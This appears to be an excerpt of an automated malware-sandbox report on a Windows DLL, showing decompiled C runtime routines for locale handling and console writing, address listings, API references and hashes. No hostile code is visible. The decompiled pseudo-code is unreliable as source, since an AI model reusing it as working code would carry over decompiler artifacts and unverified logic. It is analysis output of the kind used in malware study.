																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E24F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2491A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E242188();
																					asm("int3");
																					_t295 =  *0x6e2c76f0; // 0x10d6aa8
																					 *0x6e2c5108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2c51c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2c51ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E24DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E256102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e270ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E221C3C( &_v536,  *0x6e2c51e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e270de8; // 0x6e20815c
																					 *0x6e26a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2c52b0;
																						if(_t401 != 0x6e2c52b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E24CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E24CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E21F8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E2203A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E21F8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}








































































































































                          0x6e24e506
                          0x6e24e509
                          0x6e24e50b
                          0x6e24e50e
                          0x6e24e50f
                          0x6e24e518
                          0x6e24e520
                          0x6e24e522
                          0x6e24e524
                          0x6e24e527
                          0x6e24e640
                          0x6e24e645
                          0x6e24e52d
                          0x6e24e52d
                          0x6e24e52e
                          0x6e24e52e
                          0x6e24e531
                          0x6e24e534
                          0x6e24e536
                          0x6e24e539
                          0x6e24e539
                          0x6e24e53c
                          0x6e24e53e
                          0x6e24e541
                          0x6e24e546
                          0x6e24e554
                          0x6e24e55e
                          0x6e24e561
                          0x6e24e564
                          0x6e24e564
                          0x6e24e56f
                          0x6e24e574
                          0x6e24e579
                          0x00000000
                          0x6e24e57f
                          0x6e24e582
                          0x6e24e582
                          0x6e24e585
                          0x6e24e587
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e592
                          0x00000000
                          0x00000000
                          0x6e24e597
                          0x6e24e5ae
                          0x6e24e5ae
                          0x6e24e599
                          0x6e24e599
                          0x6e24e5a1
                          0x00000000
                          0x6e24e5a3
                          0x6e24e5a3
                          0x6e24e5a6
                          0x6e24e5ac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e5ac
                          0x6e24e5a1
                          0x6e24e5b7
                          0x6e24e5bc
                          0x6e24e5be
                          0x6e24e5c3
                          0x6e24e5c6
                          0x6e24e5c9
                          0x6e24e5cc
                          0x6e24e5cf
                          0x6e24e5d1
                          0x6e24e5d6
                          0x6e24e5e0
                          0x6e24e5e8
                          0x6e24e5f0
                          0x00000000
                          0x6e24e5f6
                          0x6e24e5fa
                          0x6e24e647
                          0x6e24e64d
                          0x6e24e650
                          0x6e24e653
                          0x6e24e655
                          0x6e24e659
                          0x6e24e65d
                          0x6e24e65f
                          0x6e24e662
                          0x6e24e667
                          0x6e24e65d
                          0x6e24e668
                          0x6e24e66b
                          0x6e24e66d
                          0x6e24e66f
                          0x6e24e673
                          0x6e24e674
                          0x6e24e676
                          0x6e24e679
                          0x6e24e67e
                          0x6e24e674
                          0x6e24e681
                          0x6e24e684
                          0x6e24e687
                          0x6e24e68a
                          0x6e24e68d
                          0x6e24e68d
                          0x6e24e5fc
                          0x6e24e5fc
                          0x6e24e5ff
                          0x6e24e602
                          0x6e24e604
                          0x6e24e608
                          0x6e24e60c
                          0x6e24e60e
                          0x6e24e611
                          0x6e24e616
                          0x6e24e60c
                          0x6e24e617
                          0x6e24e61c
                          0x6e24e61e
                          0x6e24e623
                          0x6e24e625
                          0x6e24e628
                          0x6e24e62d
                          0x6e24e623
                          0x6e24e62e
                          0x6e24e632
                          0x6e24e632
                          0x6e24e635
                          0x6e24e639
                          0x6e24e63c
                          0x6e24e63c
                          0x00000000
                          0x6e24e63f
                          0x00000000
                          0x6e24e5f0
                          0x6e24e5b2
                          0x6e24e5b4
                          0x6e24e5b4
                          0x00000000
                          0x6e24e5b4
                          0x6e24e694
                          0x6e24e695
                          0x6e24e696
                          0x6e24e697
                          0x6e24e698
                          0x6e24e699
                          0x6e24e69e
                          0x6e24e6a1
                          0x6e24e6a2
                          0x6e24e6a4
                          0x6e24e6aa
                          0x6e24e6b1
                          0x6e24e6b4
                          0x6e24e6b7
                          0x6e24e6b8
                          0x6e24e6b9
                          0x6e24e6bc
                          0x6e24e6bd
                          0x6e24e6c0
                          0x6e24e6c6
                          0x6e24e6c8
                          0x6e24e6ed
                          0x6e24e6f7
                          0x6e24e6fd
                          0x6e24e6ff
                          0x6e24e705
                          0x6e24e707
                          0x6e24e95a
                          0x6e24e95b
                          0x00000000
                          0x6e24e70d
                          0x6e24e70d
                          0x6e24e711
                          0x6e24e878
                          0x6e24e88f
                          0x6e24e894
                          0x6e24e897
                          0x6e24e899
                          0x6e24e89f
                          0x6e24e89f
                          0x6e24e8a1
                          0x6e24e8a1
                          0x6e24e8a4
                          0x6e24e8a6
                          0x6e24e8ac
                          0x6e24e8ac
                          0x6e24e8ae
                          0x6e24e935
                          0x6e24e935
                          0x6e24e8b4
                          0x6e24e8b4
                          0x6e24e8b6
                          0x6e24e8bc
                          0x6e24e8bf
                          0x6e24e8c2
                          0x6e24e8c8
                          0x00000000
                          0x00000000
                          0x6e24e8ca
                          0x6e24e8ce
                          0x6e24e8f7
                          0x6e24e8f7
                          0x6e24e8f9
                          0x6e24e8d0
                          0x6e24e8d0
                          0x6e24e8d4
                          0x6e24e8d8
                          0x6e24e8df
                          0x6e24e8e5
                          0x00000000
                          0x6e24e8e7
                          0x6e24e8e7
                          0x6e24e8ea
                          0x6e24e8ed
                          0x6e24e8f5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e8f5
                          0x6e24e8e5
                          0x6e24e904
                          0x6e24e904
                          0x6e24e906
                          0x6e24e934
                          0x6e24e934
                          0x00000000
                          0x6e24e908
                          0x6e24e908
                          0x6e24e90e
                          0x6e24e90f
                          0x6e24e910
                          0x6e24e911
                          0x6e24e916
                          0x6e24e91c
                          0x6e24e91f
                          0x6e24e921
                          0x6e24e928
                          0x6e24e92a
                          0x6e24e92c
                          0x6e24e923
                          0x6e24e923
                          0x6e24e924
                          0x00000000
                          0x6e24e924
                          0x6e24e921
                          0x00000000
                          0x6e24e906
                          0x6e24e8fd
                          0x6e24e8ff
                          0x6e24e902
                          0x6e24e902
                          0x00000000
                          0x6e24e902
                          0x6e24e93b
                          0x6e24e93b
                          0x6e24e93c
                          0x6e24e93f
                          0x6e24e945
                          0x6e24e945
                          0x6e24e94e
                          0x6e24e950
                          0x00000000
                          0x6e24e952
                          0x6e24e952
                          0x00000000
                          0x6e24e952
                          0x6e24e950
                          0x00000000
                          0x6e24e717
                          0x6e24e717
                          0x6e24e71c
                          0x00000000
                          0x6e24e722
                          0x6e24e722
                          0x6e24e727
                          0x00000000
                          0x6e24e72d
                          0x6e24e72d
                          0x6e24e733
                          0x6e24e738
                          0x6e24e73a
                          0x6e24e741
                          0x6e24e742
                          0x6e24e744
                          0x00000000
                          0x00000000
                          0x6e24e74a
                          0x6e24e74a
                          0x6e24e74e
                          0x6e24e754
                          0x00000000
                          0x6e24e75a
                          0x6e24e75c
                          0x6e24e75d
                          0x6e24e760
                          0x00000000
                          0x6e24e766
                          0x6e24e766
                          0x6e24e76c
                          0x6e24e771
                          0x6e24e77b
                          0x6e24e77f
                          0x6e24e784
                          0x6e24e787
                          0x6e24e789
                          0x00000000
                          0x6e24e78b
                          0x6e24e78b
                          0x6e24e78d
                          0x6e24e790
                          0x6e24e790
                          0x6e24e793
                          0x6e24e796
                          0x6e24e796
                          0x6e24e7a1
                          0x6e24e7a3
                          0x6e24e7a5
                          0x00000000
                          0x00000000
                          0x6e24e7a5
                          0x00000000
                          0x6e24e7a7
                          0x6e24e7a7
                          0x6e24e7ad
                          0x6e24e7b0
                          0x6e24e7b0
                          0x6e24e7be
                          0x6e24e7c7
                          0x6e24e7cc
                          0x6e24e7d2
                          0x6e24e7d5
                          0x6e24e7d6
                          0x6e24e7d8
                          0x6e24e7e6
                          0x6e24e7e6
                          0x6e24e7ed
                          0x6e24e84e
                          0x00000000
                          0x6e24e7ef
                          0x6e24e7ef
                          0x6e24e7fd
                          0x6e24e802
                          0x6e24e805
                          0x6e24e807
                          0x6e24e977
                          0x6e24e979
                          0x6e24e97a
                          0x6e24e97b
                          0x6e24e97c
                          0x6e24e97d
                          0x6e24e97e
                          0x6e24e983
                          0x6e24e986
                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e0
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9eb
                          0x6e24e9f6
                          0x6e24e9f6
                          0x6e24e80d
                          0x6e24e80d
                          0x6e24e810
                          0x6e24e815
                          0x6e24e972
                          0x00000000
                          0x6e24e81b
                          0x6e24e81d
                          0x6e24e825
                          0x6e24e82b
                          0x6e24e82c
                          0x6e24e832
                          0x6e24e833
                          0x6e24e838
                          0x6e24e83b
                          0x6e24e83d
                          0x6e24e843
                          0x6e24e845
                          0x6e24e846
                          0x6e24e846
                          0x6e24e854
                          0x6e24e854
                          0x6e24e857
                          0x6e24e859
                          0x6e24e85c
                          0x6e24e86a
                          0x6e24e86a
                          0x6e24e954
                          0x6e24e954
                          0x00000000
                          0x6e24e956
                          0x6e24e956
                          0x00000000
                          0x6e24e85e
                          0x6e24e85e
                          0x6e24e861
                          0x6e24e864
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e864
                          0x6e24e85c
                          0x6e24e815
                          0x6e24e807
                          0x6e24e7da
                          0x6e24e7dc
                          0x6e24e7dd
                          0x6e24e7e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e7e0
                          0x6e24e7d8
                          0x6e24e760
                          0x00000000
                          0x6e24e754
                          0x00000000
                          0x6e24e871
                          0x6e24e727
                          0x6e24e71c
                          0x6e24e711
                          0x6e24e6ca
                          0x6e24e6ca
                          0x6e24e6cc
                          0x6e24e6ce
                          0x6e24e6cf
                          0x6e24e6d0
                          0x6e24e6d1
                          0x6e24e6d6
                          0x6e24e961
                          0x6e24e965
                          0x6e24e966
                          0x6e24e971
                          0x6e24e971
                          0x6e24e6c8
                          0x00000000

                          APIs
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • _free.LIBCMT ref: 6E24E611
                          • _free.LIBCMT ref: 6E24E628
                          • _free.LIBCMT ref: 6E24E647
                          • _free.LIBCMT ref: 6E24E662
                          • _free.LIBCMT ref: 6E24E679
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID: 'n
                          • API String ID: 3033488037-1397255199
                          • Opcode ID: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
                          • Instruction ID: 0a893c57c1a0448593334c79b178121568037943c929681ed19f1f765fe0ec54
                          • Opcode Fuzzy Hash: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
                          • Instruction Fuzzy Hash: 5951D475A1030DEFEB59CFA9C841AAAB3FAEF45725F100569E809DF250EB35E900CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E252C2B, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E252C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e2c506c; // 0x22cbda9b
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2c76f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2c76f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E24367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E24CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E24CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E21F8A5(_v8 ^ _t133, _t129, _t132);
			}



































                          0x6e252c33
                          0x6e252c3a
                          0x6e252c3d
                          0x6e252c45
                          0x6e252c49
                          0x6e252c55
                          0x6e252c58
                          0x6e252c5b
                          0x6e252c62
                          0x6e252c6a
                          0x6e252c6d
                          0x6e252c73
                          0x6e252c79
                          0x6e252c7e
                          0x6e252c80
                          0x6e252c83
                          0x6e252c88
                          0x6e252c92
                          0x6e252c99
                          0x6e252c9c
                          0x6e252ca3
                          0x6e252caa
                          0x6e252cc5
                          0x6e252ccd
                          0x6e252cd6
                          0x6e252cfc
                          0x6e252cfe
                          0x00000000
                          0x6e252cd8
                          0x6e252cdb
                          0x6e252da2
                          0x6e252dae
                          0x6e252db9
                          0x6e252dbe
                          0x6e252ce1
                          0x6e252ce8
                          0x6e252ced
                          0x6e252cf3
                          0x6e252cf9
                          0x00000000
                          0x6e252cf9
                          0x6e252cf3
                          0x6e252cdb
                          0x6e252cac
                          0x6e252cb0
                          0x6e252cb3
                          0x6e252cb9
                          0x6e252cbb
                          0x6e252cbe
                          0x6e252cc2
                          0x6e252cff
                          0x6e252d02
                          0x6e252d03
                          0x6e252d08
                          0x6e252d0e
                          0x6e252d14
                          0x6e252d23
                          0x6e252d29
                          0x6e252d2f
                          0x6e252d34
                          0x6e252d50
                          0x6e252dc3
                          0x6e252dc9
                          0x6e252d52
                          0x6e252d5a
                          0x6e252d63
                          0x6e252d69
                          0x00000000
                          0x6e252d6b
                          0x6e252d6d
                          0x6e252d70
                          0x6e252d89
                          0x00000000
                          0x6e252d8b
                          0x6e252d8f
                          0x6e252d91
                          0x6e252d94
                          0x00000000
                          0x6e252d94
                          0x6e252d8f
                          0x6e252d89
                          0x6e252d69
                          0x6e252d63
                          0x6e252d50
                          0x6e252d34
                          0x6e252d0e
                          0x00000000
                          0x6e252d97
                          0x6e252d97
                          0x6e252dcb
                          0x6e252ddd

                          APIs
